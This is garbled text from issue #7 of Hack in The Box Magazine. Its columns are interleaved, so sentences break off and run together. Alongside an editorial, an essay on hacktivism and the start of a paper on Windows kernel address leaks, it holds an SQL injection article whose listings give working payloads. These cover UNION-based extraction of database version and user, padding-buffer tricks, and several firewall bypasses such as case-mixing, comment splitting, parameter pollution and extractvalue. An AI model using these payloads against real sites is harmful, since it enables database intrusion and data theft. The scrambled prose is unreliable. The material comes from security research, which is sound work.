Beruflich Dokumente
Kultur Dokumente
org
Intrusion as a
Service Using
SHODAN 50
Beyond Fuzzing
Exploit Automation
with PMCM 42
Cover Story
What Would We Do
Without Enemies 04
Advertisement
Editorial Contents
Hello readers and welcome to issue #7.
It has been a long journey since the first release of the magazine and
we have seen a lot of changes and improvements overtime and still
trying our best to do more.
But as we grow, the amount of work and the time we need to spend
working on the magazine have also increased, thus requiring us to
recruit more people to join our small editorial team. So, if you think
you would like to do something for the community and believe that
we can have a great use of your talent - Feel free to drop us an email! Cover Story
As for issue #7, Jonathan Kent wrote a great piece of article about the
What Would We Do
current global crisis in the cyberspace while Aditya K. Sood and his Without Enemies 04
team on the other hand wrote about extending SQL injection attacks Database Security
through buffer overflow exploitation. We are also very happy to have
Jonathan Brossard contributing an article introducing the readers
Extending SQL Injection Attacks
to his newly released exploitation framework. We will leave you to Using Buffer Overflows Tactical
explore the rest of the articles and we hope you enjoy them. Exploitation 12
Windows Security
Have fun reading this issue and more to come in issue #8!!
Windows Security Hardening Through
Kernel Address Protection 20
Zarul Shahrin Suhaimi
Editor-in-Chief, professional development
Hack in The Box Magazine CISSP Corner 34
Books 38
A Place To Be You
Application Security
Beyond Fuzzing:
Editor-in-Chief Exploit Automation with PMCMA 42
Zarul Shahrin
http://twitter.com/zarulshahrin
Editorial Advisor
Dhillon Andrew Kannabhiran
Chances are you have a good idea of where you
Technical Advisor
want to go in life. At Google, we've designed a Matthew j00ru Jurczyk
culture that helps you get there. Design
Shamik Kundu
We're hiring! http://twitter.com/cognitivedzine Network Security
Intrusion as a Service
Website Using SHODAN 50
Bina Kundu
Apply online: www.google.com/ EngineeringEMEA HITB Magazine Keeping Knowledge Free Studies on Distributed Security Event
http://magazine.hackinthebox.org Analysis in Cloud 58
2010 Google Inc. All rights reserved. Google and the Google logo are trademarks of Google Inc.
Cover story
What Would We Do
Without Enemies? Jonathan Kent
Twenty years ago the Soviet Union collapsed. We were supposed to get a peace dividend.
All the money that would have gone on buying tanks and missiles to keep out the
Russians could go on hospitals and schools instead.
R
emember September 2001? A world that had Still, the interests that bond Anonymous hacktivists
once quaked in its boots at the prospect of together seem broadly political. Targets include right
millions of Russian soldiers, thousands of tanks wing hate groups, repressive governments, exploitative
and hundreds nukes instead quaked at the cults and, occasionally, corporations. Earlier this month
prospect of a few thousand men with beards and robes it targeted the New York Sock Exchange (albeit with
hijacking planes. In 2001 the US defence budget stood limited impact) in support of the Occupy Wall Street
at $432 Billion. By 2010 that had risen to $720 Billion, demonstrations.
inflation adjusted.
LulzSec, in turn, may have started doing it for the lulz
Remember September 2011? A world that once quaked in but its attacks on the US Senate, the CIA and elements
its boots at the prospect of Soviet military might and so- of the Murdoch element are equally political so is their
called Islamic militants now quakes at... a few hundred white-hatted gesture to Britains National Health Service;
geeks in a few hundred bedrooms with a few hundred flagging security issues so that they could be fixed.
empty pizza boxes.
However what is routinely ignored by the media is that many
Secret Service investigations have shown that complex hacktivists are united by their contempt for bad code, crap
and sophisticated electronic crimes are rarely perpetrated security and what they see as flim-flam security companies
by a lone individual, Secret Service Deputy Agent Pablo especially when all that translates as corporations and
Martinez told the US Senate Judiciary Committee that governmental bodies failing to protect citizens data.
month, turning the lone gunman theory on its head: a
lone gunman can assassinate the President of the United The hacktivists act as a canary in the mineshaft for CSOs (not
States but it takes a criminal network of awesome power all of whom are grateful for being publicly exposed for being
to leave graffiti on a law enforcement website. asleep at the wheel), but reading the mainstream media
coverage you could be forgiven for having not the faintest
Online criminals organize in networks, Martinez went on, idea of hackers part in improving computer security.
often with defined roles for participants, in order to manage
and perpetuate ongoing criminal enterprises dedicated to The Economist, normally unimpeachable on any subject
stealing commercial data and selling it for profit. it chooses to cover, concluded a piece on hacking and
security with the line; The hacktivists may do most
At the same hearing Associate Deputy Attorney General damage by providing cover for more sinister efforts.
James Baker told senators that many hackers are tied to
traditional Asian and Eastern European organized crime It somehow presupposes that the security apparatus of
organizations. Presumably by traditional he means being major nations or international crime syndicates somehow
more comfortable wielding a cosh than a keyboard Martins computers. If the US or Israel were involved in the Security services and banks tend to be benefit from political hacking. Kenneth Geers of NATOs
rather than wearing traditional costume. presumed hack of an Iranian nuclear facility it was in the cyberwar centre in Estonia says the hacking boom makes
certain knowledge that the Iranians were never going to pretty low key about breaches. Banks it easier for cyber-spies to pass off their work as the
Hackers, it would appear, are a new enemy. The perceived
threat has led the US government to propose new laws
be able to swoop on any of those involved. The proposed
penalties may be tough, but they wont look that scary to
build losses into their charges. In any case handiwork of a misguided rebellious teenager. Not so
funny after all, the piece concludes.
that would put away hackers for 20 years for threatening a cyber spy sitting in Moscow or Beijing. their losses due to hacking are small beer As one comment on the
national security, 10 for stealing data and three for hacking Economist article pointed
a government computer. As for organised crime; there are plenty of jurisdictions besides those due to the overconfidence out; If Lulzsec has gained
It fell prey to a process known as The Enclosures where Now, after two centuries where most people have been
rich men bribed politicians to pass laws allowing them to forced to work for big employers, the internet has started
fence off the commons and keep it for themselves. to change everything again not by shepherding us
towards something entirely new but rather by resetting
Some try to portray this as a good thing. They argue that our working lives to something elements of which our
common land had been used inefficiently and that it distant ancestors might have recognised.
needed private landlords to make it productive.
Writers like Cory Doctorow, Charlie Stross and others
Well that wasnt the view of the contemporary commentator have envisaged a future in which economic units shrink
William Cobbett; a farmer himself, an employer and a until more and more are simply once again autonomous
famous observer of rural England. I hope, most anxiously, individuals. Big corporations are proving flat footed as
that we shall hear of many of the late new enclosures being smaller, nimbler operations innovate and respond faster.
thrown again to common. They were, [i.e. the enclosures] for Its a future where individuals once again take control
the most part, useless in point of quality of production; and, to over their own destiny. Where self worth, independence
the labourers, they were malignantly mischievous. and self sufficiency are once again a possibility for
millions of people whod otherwise only have the choice
Cobbett expands on his point about the enclosed of wage slavery.
land being less, not more productive: Downs [i.e. hilly
grazing land], most beautiful and valuable too, have The big corporations, just like the big landowners of 200
been broken up by the paper system; and, after three or years ago, try to respond by exerting their control over
four crops to beggar them, have been left to be planted common spaces.
with docks and thistles, and never again to present that
perpetual verdure, which formerly covered their surface, With the internet this comes in the form of ending net
and which, while it fed innumerable flocks, enriched the neutrality, of net giants acting as gatekeepers that force
neighbouring fields. users to channel transactions through their portals or, as
George Monbiot points out, of rich corporations hiring
Nor is that just a contemporary view. The economic trolls to skew debate or ratings systems in their favour.
historian Robert Allen agrees with Cobbetts assessment;
far from boosting productivity the land grab coincided One of the characteristics of common ownership is that
with a period of stagnation in agricultural production. the communities that manage such assets tend to do
so with sustainability in mind. If thats true of anything
That in turn had another effect which those of us who rely today its true of the interweb. Those who seek to keep
on the net for our livings should be aware of. it free believe that its true potential lies in unlocking
the potential of the many not in corralling them into
The enclosures removed the ability of poorer people to enclosures run by the few.
make their own living and drove them into the arms of
factory owners who forced down their wages, fed and Whether its the Open Rights Group, the Anti-Sec
housed them badly and treated them worse. William movement or Lulzsec or Anonymous, the varied responses
Cobbett again: They drove them from the skirts of commons, represent the attempts by elements of the net community
downs and forests. They took away their cows, pigs, geese, to preserve the commons. Theyre demonised for their
fowls, bees and gardens. They crowded them into miserable activities just as the Luddites or the followers of Captain
outskirts of towns and villages, for their children to become Swing were 200 years ago.
ricketty and diseased, confined amongst filth and vermin.
They took from them their best inheritance: sweet air, health But whether or not you agree with the hacktivists
and the little liberty they had left. methods they seem to be aware of what is at stake.
Its not just the future of the internet. The choice of
Its as though a mirror from 1820 has been held up to how and for whom we work cannot be separated from
our world in 2011. Two hundred and fifty years ago the our other freedoms and civil liberties. We should be
commons provided a different (and surprisingly modern) defending common spaces that are starting to allow
way of working. It was collaborative. People came together people a real choice. Its about what sort of world we
to bring in the harvest, to share tools, to throw up a house live in whether its one shaped by the many or by
for a newly married couple. Groups would form and the few. Anonymous have declared: we are legion. Its
break up as needed and reform in a different shape for going to take legions to prevent big money doing to
a different project. Of course many chose to work for an the internet what they did to the commons in other
employer six days a week. But they had choices. spaces and other times.
Extending SQL
Injection Attacks Using
Buffer Overflows
Tactical Exploitation
Aditya K Sood, Rohit Bansal and Richard J Enbody
S
QL injections can be used BY2 statement which is normally Determining the Visibility of PHP binds the value (using IN) in the query, Listing 5. Visibility Function Practical Usage in PHP
to steal information from used to sort the records based on Application then it is considered to be good SELECT * FROM vulnerable_page WHERE is_visible IN (568 and order by 7)
vulnerable applications the specified columns. Repeatedly Visibility3 is an attribute in PHP-based protection against SQL injections. If SELECT * FROM vulnerable_page WHERE is_visible = 568 and order by 7
running databases at the applying the command triggered an web applications that indicates the "$vulnerable_id" takes the value "578
backend. Advanced SQL attacks error message from which you can access property of variables and and order by 7," then the statements Listing 6. Finding Version of Database through Iteration
can also include injecting malicious infer the number of columns. The methods. Typically there are three can be used in an attack as shown in http://www.example.com/category.php?id=578+union select
version(),2,3,4,5,6,7--
payloads into a database to create success of enumerating the number access values: public, protected and listing 5. The number 7 is the number http://www.example.com/category.php?id=578+union select
1,version(),3,4,5,6,7--
persistent infections. A successful of columns depends on the schema private. By default, all the methods are of columns that we derived earlier; http://www.example.com/category.php?id=578+union select
SQL injection can devastate an of database. This can be done as public in PHP (if var is used to define the 568 is arbitrary. 1,2,version(),4,5,6,7--
--------
organization. As an example, the presented in listing 2. them) allowing access anywhere in http://www.example.com/category.php?id=578+union select
1,2,3,4,5,6,version()--
SQLXSSI1 SQL injection technique the application. A protected verifier The bind parameter (IN) does not
has been used to spread malware. In listing 2, we keep on increasing restricts the access to inherited classes provide complete SQL injection http://www.example.com/category.php?id=578+union select 1,2,3,4,5,6,
grOup_conCat(version(),0x3a,user(),0x3a,version())--
In the face of these threats research the number in the ORDER BY clause whereas a private value limits the protection, but it is still considered
is required to find the new attack until we got the error from which we visibility to the native classes. From an to be good practice because it Listing 7. Resultant Error
techniques so that appropriate infer that the table has 7 columns. SQL injection point of view, consider provides some protection. From an Internal Server Error
protection mechanisms can be We can confirm that the number of two statements as presented in listing SQL injection point of view, how
The server encountered an internal error or misconfiguration and was
developed. In this paper, we present columns is actually 7 with the session 4 that indicate usage. visibility is defined plays a crucial unable to complete your request. Please contact the server administrator,
webmaster@example.com and inform them of the time the error occurred, and
an SQL injection exploitation mentioned in listing 3. role because this property can be anything you might have done that may have caused the error.
technique using buffer overflows in The parameter "$vulnerable_id" used to extract information from the More information about this error may be available in the server error
the culprit functions. This error in listing 3 indicates that matches a string value. Generally, database. Next, we try to determine log. Additionally, a 404 Not Found error was encountered while trying to
use an Error Document to handle the request.
there are no more columns in the two statements in listing 4 are whether we can enumerate the
SQL Injection Using Buffer this particular table. At this point, equivalent, but they may work MySQL version from the database. Listing 8. MySQL Errors to the Corresponding Queries
Overflows we conclude that the number of differently in scenarios where the We use injections as presented in
Input
To best present this technique, we will columns is 7. The next step involves "$vulnerable_id" takes multiple listing 6. http://www.example.com/category.php?id=578+and+order+by+7
walk through the details. These details determining the visibility of variables values. If "$vulnerable_id" holds a Output
are crucial and must be understood that are used in columns. scalar value and if the developer If you look carefully at listing 6, we You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by
to dig deeper into the buffer-based are repeatedly trying the "version()" 7--' at line 14
SQL injection exploitation technique. Listing 1. SQL Injection Fingerprinting function in every single column Input
entry to find whether that function http://www.example.com/category.php?id=578/*and*/order+by+7
Input
Detecting a Vulnerable Website executes successfully or not. This is Output
http://www.example.com/category.php?id=578 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
The first step is to find a vulnerable http://www.example.com/category.php?id=578%27 possible only if the columns have been resource in /home/mfpseals/public_html/category.php on line 77. No parts
found in this category
website that shows that an SQL Output defined to be visible in the vulnerable
injection is feasible. To do that we "You have an error in your SQL syntax; check the manual that corresponds to
PHP based web application. In a
can use automated tools and manual your MySQL server version for the right syntax to use near '\'' at line 14" number of cases, the output of the There might be a web application injection. To proceed further it is good
techniques to find a vulnerable injection will be displayed on the firewall or intrusion prevention to avoid the "+ binding parameter
web application. Let's assume that Listing 2. ORDER By Clause in Action web page. Sometimes examining the system. between queries.
a vulnerable website has been Input web page source is a useful way to The queries successfully pass through
detected. By injecting a trivial SQL http://www.example.com/category.php?id=578+order+by+1-- find error information because some a web application firewall, but a PHP From listing 7, we find that web
http://www.example.com/category.php?id=578+order+by+2--
character string (';--) that displays http://www.example.com/category.php?id=578+order+by+3-- error messages are embedded in the application running on remote web application is throwing an internal
as %27, we find that website is source. This is because the output server fails to interpret it. server error. However, at the same
http://www.example.com/category.php?id=578+order+by+7--
vulnerable to SQL injection as shown from the vulnerable web application time the web application is generating
Output
in listing 1. depends on the design and the way Often a web application firewall or a different set of errors that indicates
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result content is rendered into the web intrusion prevention system detects progress with the SQL injection. At
resource
The error message shown in listing 1 in /home/mfpseals/public_html/category.php on line 77 No parts found in browser. Often the injections are the presence of a "+" character in the this point, we are not successful in
this category
confirms the possibility that our SQL successful and produce the desired URL and denies access. However, it executing a payload through SQL
injection attack might be feasible. Listing 3. Determine the Number of Columns output. One can use number of is possible to trick web application injection. The next section leverages
Since we will be attacking columns, queries collectively to enumerate the firewalls by using a pattern such as the details of buffer selection and
Input
we now move to the second step of database. However, we encounter the "/* */" which is used for specifying overflow techniques that lead to
http://www.example.com/category.php?id=578+order+by+8--
enumerating the columns. following error as shown in listing 7.comments. For example: the URL exploitation through SQL injection.
Output presented in listing 5 can be used as
Fingerprinting the Number of "Unknown column '8' in 'order clause'" Such an error often prevents further shown in listing 8. Buffer Selection and Overflow
Columns exploitation, but we show a way In the last section we encountered an
This step involves a lot of manual Listing 4. Visibility Function - Implementation in PHP to continue. The error presented in This test shows that the binding internal server error as output of the
efforts in order to find the number SELECT * FROM vulnerable_page WHERE is_visible IN ($vulnerable_id) listing 7 may occur for either of the parameter (+) plays a critical role SQL injection queries. Is there a way
SELECT * FROM vulnerable_page WHERE is_visible = $vulnerable_id
of columns. It is useful to use ORDER following reasons: in the execution of successful SQL to bypass the internal server error and
Listing 9. SQL Injection Using Buffer Listing 10. SQL Injection using Buffer Overflow Attempt Listing 11. Successful SQL Injection using Buffer Overflow
Input Input Input
http://www.example.com/category.php?id=578/*!and*/(select http://www.example.com/category.php?id=578/*!and*/%28select%201%29=
0xBBBBBBBBBBBBBBBBBBBBBB)= http://www.example.com/category.php?id=578/*!and*/%28select 28select%200xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
select 1,2,3,4,5,6,grOup_conCat%28version%28%29,0x3a,user%28%29,0x3a,vers (BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB)=%28select%20 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ion%28%29%29 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Output AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You have an error in your SQL syntax; check the manual that corresponds AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
to your MySQL server version for the right syntax to use near 'select AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
1,2,3,4,5,6, grOup_conCat(version(),0x3a,user(),0x3a,version())' at line 14 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
to exploit SQL injection? It is possible, Now the overall query looks like as X AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
but it requires a buffer selection = Z.Y which is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
and overflow technique to be used AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
in conjunction with SQL injection At this point, buffer Z acts as padding AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
payload. with the SQL payload appended at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
the end. Of course, we are not sure AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA%29union%20select%201,2,3,4,5,6,grOup_conCat %28version%28%29,0x3a,user%28%29,0x3a,versi
At first, we need to examine the about the buffer length in Z so we AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA on%28%29%29--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Output
reaction of the web application when try multiples of 8 such as 32, 64, 128, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA You have an error in your SQL syntax; check the manual that corresponds to your
we inject a raw buffer in the select 256, 512, 1024. For the next step AAAAAAAAAAAAAAA%29union%20select%201,2,3,4,5,6, MySQL server version for the right syntax to use near '
statement. Let's try the following SQL the SQL injection payload should be grOup_conCat%28version%28%29,0x3a,user%28%29,0x3a,version%28%29%29
==========================================================
injection query as shown in listing 9. constructed as shown in listing 10. Output .92-community:mfpseals_dbuser@localhost:5.0.92-community'
Unknown column 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB' ==========================================================
in 'field list' at line 3
The error presented in listing 9 reflects Note, in listing 10, we do not use
back our SQL injection payload and Listing 12. WAF Bypass Scenarios + ExtractValue SQL Injection Trick
the application provides a promising
(select 0xBBBBBBBBBBBBBBBBBBBBBBBBBBBB) = (select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA). select 1. Exploiting Case Limitations
response. Lets take a closer look at 1,2,3,4,5,6,grOup_conCat%28version%28%29,0x3a,user%28%29,0x3a,versi
on%28%29%29 http://www.example.com/circulardetail.php?id=15/*!and*/(sElecT+1)=
the query. The query can be broken (SelEcT+0x[Inject Buffer]) uNioN+aLl+SeleCt+1,CoNcat(vErSioN()),3{
down as http://www.example.net/news political.php?recordID=100+aNd+1=2+uNioN+aLl+sElecT +1,2,CoNcaT(Count(*)),4,5,6+fRoM
information in the error message +information schema.table constraints
X = (select 0xBBBBBBBBBBBBBBBBBBBBBBBBBBBB) as shown in listing 12. The desired
Y = select http://www.example.com/store/shop.php?pid=2 or1 /*!groupby*/ concat(concat ws(0x3a,version()),oor(rand(0)*2))
1,2,3,4,5,6,grOup_conCat%28version%28%29,0x3a,user%28%29,0x3a,versi information is between the double having min(0)or1{
on%28%29%29
lines. In this case we have discovered 2. Camouflaging
http://www.example.net/news political.php?recordID=100+aNd+1=2+uniUNIONon+selSELECTect +1,2,CoNcaT(Count(*)),4,5
both the MySql version and the ,6+fRoM+information schema.table constraints
The SQL injection payload, i.e. part hexadecimal characters in the database user account nameboth 3. Divide and Bypass
Y, what we see reflected back in the buffer X. This is because we need are useful for further exploitation. We http://example.com/detail.php?id=-6 uni*onsele*ct 1,2,3,4,5,co*u*nt(table name),7,8,9,10,11,12,13,14 from
information schema.tables--
error message of listing 9. However, to determine the column name get the error message because the
http://example.com/detail.php?id=-6 un%0a%0dion select 1,2,3,4,5,count
we do not want the web application which we do by fuzzing with rogue conditional check imposed on the (table name),7,8,9,10,11,12,13,14 from information schema.tables
to simply reflect back our SQL input. The buffer X just initiates a column does not handle the supplied 4. HTTP Parameter Pollution
injection payload. Instead we want it conditional check with respect to (and overflowed) buffer which results http://example.com/detail.php?id=-6 uni*on&id=sele*ct 1,2,3,4,5,co*u*nt (table name),7,8,9,10,11,12,13,14 from
information schema.tables
to get executed in the context of the buffer Z. As a result, we can pick any in executing the SQL injection.
5. Extract Value Trick
vulnerable web application. However, number from {1...7} in order to specify http://www.example.org/news.php?id=null'+and+extractvalue(rand(),concat(0x3a,version())){+-
we are setting a condition which has the column name in the field listthe Our tests work successfully in
to be true in any case. The conditional number of columns determined in an the MySql community edition
statement uses two select statements earlier step. In reality, buffer X is not version 5.0.92. Of course, this Additionally, rhw XML based function Conclusion the injection further. Combining
as follows as important as choosing a column, technique is difficult to test and to extractvalue() can also be used together In this paper we have discussed techniques as we did here can
column 1 in our case. . So after fuzzing execute appropriately in real time with the buffer overflow trick, if a tester a new technique for conducting help push attacks further. With the
(select 1) = X a bit with length of buffer Z, we design environment, but it can be done. does not want to use union calls. This SQL injections in scenarios when knowledge gained robust systems
(select 2) =Y the complete SQL injection query as function only works for MySQL version we seem to have run up against can be designed.
shown in listing 11. Are we limited to only finding version > 5.1. Basically, it executes SQL injection formidable defenses. Advanced
In order to execute the SQL injection, number and database user account? in the XPATH query. techniques are required to push
we introduce another buffer, Z, Now, when executing that SQL No, all the WAF bypasses shown in
and the SQL injection payload is injection query the application listing 13 can be used in conjunction
appended at the back of this buffer as successfully executes the SQL injection with the buffer overflow trick. Split
follows payload that returns the desired the provided example and copy-and-
>>REFERENCES
1. http://secniche.blogspot.com/2011/04/sqlxssi-persistent-malware-base.html
paste into the query of listing 11. 2. http://dev.mysql.com/doc/refman/5.0/en/order-by-optimization.html
Z = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA).
3. http://php.net/manual/en/language.oop5.visibility.php
>>Appendix
1. Detecting Vulnerable Website
Windows Security
Hardening Through
Kernel Address
Protection
Matthew "j00ru" Jurczyk
As more defense-in-depth protection schemes like Windows Integrity Control or
sandboxing technologies are deployed, threats affecting local system components
become a relevant issue in terms of the overall operating system users security plan.
In order to address continuous development of Elevation of Privileges exploitation
techniques, Microsoft started to enhance the Windows kernel security, by hardening
the most sensitive system components, such as Kernel Pools with the Safe Unlinking
mechanism introduced in Windows 719. At the same time, the system supports
numerous both official and undocumented services, providing valuable information
regarding the current state of the kernel memory layout. In this paper, we discuss the
potential threats and problems concerning unprivileged access to the system address
space information. In particular, we also present how subtle information leakages can
prove useful in practical attack scenarios. Further in the document, we conclusively
provide some suggestions as to how problems related to kernel address information
availability can be mitigated, or entirely eliminated.
Introduction brokers can be specically subject 1. Prevention of undesired actions Since the security level of a Address Space Object Manager information,
Communication between distinct to software vulnerabilities. Given 2. Integrity check of the internal state program often relies on how hard Information Sources
modules running at different the fact that some security flaws 3. Randomization of the internal state it is for the client to predict the In this section, we review the existing
The service does not require any
privilege levels or within separate can expose a way to accomplish brokers internal state, it becomes means, by which regular programs specific privileges from the requestor,
security domains takes place most highly-privileged code execution The first group of mechanisms is obvious that the latter should can obtain information regarding the thus every information class is
of the time, in numerous fields of from within an untrusted client, designed to stop every effort made to never reveal more information, kernel memory layout. available to every program running on
modern computing. Both hardware- the overall security architecture perform actions, which are otherwise than actually required for a client the operating system. Consequently,
and software-enforced privilege can be potentially circuvmented by considered undesired or suspicious to function properly. The desire of Windows System the routine makes a great source
separation mechanisms are designed exploiting one security issue in a (e.g. code execution from non- memory layout information can be Information Classes of utile information, which can be
to control the access to certain single trusted module. executable pages). The second group easily observed in the context of Since the very early days of used by a local attacker, previous to
resources - grant it to modules with aims to examine if the programs web-browsers, where any kind of the Windows NT-family system performing an Elevation of Privileges
higher rights, while ensuring that Despite the usual methods of internal integrity has been damaged, information leakage to javascript development, the kernel provided a attack against the machine.
unathorized entities are not able to reducing the amount of software which usually implies that an attack code is considered a legitimate and centralized service, which would be
reach the protected data. security problems found in brokers against a security issue is in progress. valuable security vulnerability. used to query any type of information In further subsections, we review the
- fuzzing and source code auditing - Both types of mitigations work in a regarding the current system state, particular information classes, that
The discussed architecture is usually efforts have been made to address the completely deterministic manner, as Interestingly, Microsoft does not from both user- and kernel-mode can be used to obtain a solid amount
based on setting up a trusted set of consequences of software bugs in a they only ensure that no potentially seem to follow the discussed principle mode. This specific system call is of kernel memory addressing details.
modules (further referred to as the more generic way. Namely, Microsoft harfmul operation are, or were in terms of user- and kernel- mode named NtQuerySystemInformation We will briefly characterize the
broker) in the privileged area, while - as well as other operating system performed on the local machine. transitions. The operating system (see Listing 1), and currently internal structures used to describe
having the potentially malicious code vendors - introduced several anti- includes specific address leaks as parts manages more then 80 information the system state, before moving
(also called "the guest") executed in exploitation mechanisms, purposed As opposed to the first two groups, of its regular functionality, and even classes (specified by the SYSTEM_ to specic scenarios, in which the
a controlled environment. In order to render some local vulnerabilities the sole purpose of internal state provides documented API interface INFORMATION_CLASS enum, defined obtained information can turn out to
for the low-integrity programs to completely useless, and make it randomization is not to detect for some of these services. In our in winternl.h). be of great value.
retain their original functionality, considerably harder to use others. vulnerability exploitation in itself, opinion, this quasicorrect behavior is
the broker usually provides a special The most commonly known security but rather to make the applications a result of a lack of an official policy The current amount of possible SystemModuleInformation
communication channel, through features implemented in Windows execution path dependent on a random as of how important it is to keep query types is caused by a legacy The information class is used to
which the guest can make use of are: Stack Cookies24, Heap Protection8 factor, ideally unable to be guessed by kernel addresses secret. In order policy - once introduced, probably retrieve basic data regarding all device
